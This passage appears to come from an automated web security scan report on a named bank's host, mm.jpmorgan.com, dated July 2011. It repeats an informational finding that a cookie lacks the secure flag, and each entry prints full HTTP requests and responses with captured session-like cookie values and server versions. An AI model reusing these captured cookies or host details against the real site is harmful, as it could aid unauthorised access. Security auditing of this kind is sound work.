Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"5077-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:53 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 5077
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
table.ygtvtable{margin-bottom:0;border:
...[SNIP]...

7.66. https://mm.jpmorgan.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 302 Found
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:00 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Location: https://iblogin.jpmorgan.com/sso/action/federateLogin?URI=https%3a%2f%2fmm.jpmorgan.com%3a443%2ffavicon.ico&msg=+&securityLevel=0&cs=V05Mtro7P%2f8lpwB5gAv4hsgbAKM%3d
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:35:00 GMT
Vary: Accept-Encoding
Content-Length: 361
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://iblogin.jpmorgan.com/sso/action/federat
...[SNIP]...

7.67. https://mm.jpmorgan.com/images/JPM_logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/JPM_logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/JPM_logo.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"1863-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 1863
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

7.68. https://mm.jpmorgan.com/images/Morgan_Markets_logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/Morgan_Markets_logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/Morgan_Markets_logo.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"2594-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 2594
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

7.69. https://mm.jpmorgan.com/images/backgrounds/btn_hover_center_bg.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/backgrounds/btn_hover_center_bg.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/backgrounds/btn_hover_center_bg.png HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:26 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"177-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=3600
Expires: Tue, 12 Jul 2011 17:30:26 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 177
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/png


7.70. https://mm.jpmorgan.com/images/btn_center_bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/btn_center_bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_center_bg.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"138-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 138
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


7.71. https://mm.jpmorgan.com/images/btn_hover_center_bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/btn_hover_center_bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_hover_center_bg.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:25 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"87-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:30:25 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 87
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


7.72. https://mm.jpmorgan.com/images/btn_hover_left_side.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/btn_hover_left_side.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_hover_left_side.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:25 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"170-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:30:25 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 170
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


7.73. https://mm.jpmorgan.com/images/btn_hover_right_side.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/btn_hover_right_side.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_hover_right_side.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:26 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"170-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:30:26 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 170
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


7.74. https://mm.jpmorgan.com/images/btn_left_side.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/btn_left_side.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_left_side.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"175-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 175
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


7.75. https://mm.jpmorgan.com/images/btn_right_side.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/btn_right_side.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_right_side.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"174-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 174
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


7.76. https://mm.jpmorgan.com/images/icons/attention.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/icons/attention.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/attention.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:27 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"709-1310119382000"
Last-Modified: Fri, 08 Jul 2011 10:03:02 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:30:27 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 709
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

7.77. https://mm.jpmorgan.com/images/menu_bg_img.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/menu_bg_img.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/menu_bg_img.jpg HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"4057-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 4057
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

...[SNIP]...

7.78. https://mm.jpmorgan.com/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /index.jsp

Issue detail

